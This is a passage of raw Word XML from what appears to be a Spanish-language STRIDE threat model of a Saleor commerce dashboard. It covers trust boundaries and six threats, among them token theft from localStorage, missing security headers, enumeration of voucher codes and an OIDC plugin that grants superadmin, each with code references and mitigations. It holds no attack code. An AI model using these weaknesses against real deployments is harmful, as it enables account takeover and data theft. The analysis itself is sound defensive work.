        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="modelo-de-amenazas-stride"/>
      <w:r>
        <w:t xml:space="preserve">2.1 Modelo de amenazas STRIDE</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="dfd-con-fronteras-de-confianza"/>
      <w:r>
        <w:t xml:space="preserve">DFD con fronteras de confianza</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  EXTERNAL ENTITY                 PROCESS                      DATA STORE</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> ┌───────────────┐         ┌────────────────────┐</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> │ Staff (browser)│──(1)──▶ │ SPA Dashboard       │──(2)──▶ ┌──────────────────┐</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> └───────────────┘         │ (JS en navegador)   │        │ localStorage      │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        ▲                  └─────────┬──────────┘         │ _saleorRefreshToken│</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        │                            │ (3) HTTPS/GraphQL    │ _saleorAuthPluginId│</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        │                  ==========+=== TRUST BOUNDARY A =└──────────────────┘</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        │                            ▼</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> ┌───────────────┐         ┌────────────────────┐</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> │ Google OIDC    │◀─(4)──▶ │ Saleor GraphQL API  │──(5)──▶ ┌──────────────┐</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> │ (tercero)      │  OAuth  │ (+ plugin google_oidc)│        │ PostgreSQL    │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> └───────────────┘         └────────────────────┘         └──────────────┘</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        === TRUST BOUNDARY B (tercero externo) ===</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> Fronteras de confianza:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  A) Navegador (no confiable) &lt;-&gt; API backend (confiable)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  B) Saleor &lt;-&gt; Proveedor OIDC de terceros (Google)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  - localStorage es accesible por cualquier JS del origen (incl. XSS).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="tabla-de-amenazas-stride-6-entradas"/>
      <w:r>
        <w:t xml:space="preserve">Tabla de amenazas STRIDE (≥6 entradas)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:type="pct" w:w="4999.999999999999"/>
        <w:tblLook w:firstRow="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="344"/>
        <w:gridCol w:w="918"/>
        <w:gridCol w:w="1836"/>
        <w:gridCol w:w="1033"/>
        <w:gridCol w:w="1262"/>
        <w:gridCol w:w="252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STRIDE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:bottom w:val="single"/>
            </w:tcBorders>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Activo / Flujo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:bottom w:val="single"/>
            </w:tcBorders>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Amenaza</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:bottom w:val="single"/>
            </w:tcBorders>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Evidencia</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:bottom w:val="single"/>
            </w:tcBorders>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Mitigación propuesta</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">T1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">S</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">poofing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">localStorage → reuso de token (flujo 2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">El</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">refreshToken</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">persiste en</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">localStorage</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">; robado vía XSS o acceso físico, permite suplantar a un usuario staff.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">legacy-sdk/core/storage.ts:37</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">localStorage.setItem(SALEOR_REFRESH_TOKEN, token)</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">); clave</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">_saleorRefreshToken</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">core/constants.ts:2</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Cookie</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">HttpOnly</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">+</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">Secure</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">+</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">SameSite</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">para el refresh token; rotación; acortar TTL.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">T2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">T</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">ampering</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Respuesta HTTP del SPA (flujo 1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Nginx sirve el Dashboard</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">sin</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">cabeceras de seguridad (sin CSP,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">X-Frame-Options</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">X-Content-Type-Options</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, HSTS), habilitando clickjacking e inyección de scripts.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">saleor-dashboard/nginx/default.conf</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">— el</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">server { … }</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">no define ninguna directiva</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">add_header</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Añadir</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">Content-Security-Policy</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</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w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">Strict-Transport-Security</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">T3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">R</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">epudiation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Listado de cupones (flujo 3)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">La enumeración masiva de cupones se hace en cliente sin trazas; un staff puede extraer todos los códigos sin dejar registro atribuible.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">CouponPracticeButton.tsx:66-88</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(consulta</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">network-only</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">directa).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Registrar consultas sensibles en el backend; auditar acceso a</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">vouchers</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">codes</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">T4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">I</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">nformation Disclosure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Query</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">PracticeVouchers</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(flujo 3)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">El botón consulta</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">todos</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">los vouchers y sus</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">códigos</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">codes(first:100){ code, used, isActive }</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">) en cliente; cualquier staff con permiso de lectura enumera todos los códigos de descuento.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">CouponPracticeButton.tsx:5-37</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(query) y</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">:70-75</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(ejecución).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Limitar campos devueltos; paginar/agrupar en backend; exigir permiso específico; no exponer</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">code</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">salvo necesidad.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">T5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">D</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">enial of Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">API GraphQL (flujo 3)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Query costosa y anidada (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">vouchers(first:100)</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">×</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">codes(first:100)</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">×</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">channelListings</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">) con</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">fetchPolicy:"network-only"</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(sin caché) repetible a voluntad; favorece abuso/coste.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">CouponPracticeButton.tsx:5-37,72</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Límites de profundidad/complejidad GraphQL; rate-limiting; persisted queries.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">T6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">E</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">levation of Privilege</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Plugin OIDC (flujo 4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">GoogleOIDCPlugin</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">concede</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">todos</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">los permisos y marca</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">is_staff=True</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">a cualquier email del allowlist por env o dominio; una variable de entorno mal puesta (o inyectada) convierte a cualquier cuenta Google en superadmin.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">saleor/saleor/plugins/google_oidc/plugin.py</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">is_staff_user_email</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">_grant_full_permissions_if_allowed</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">user.effective_permissions = get_permissions()</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">),</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
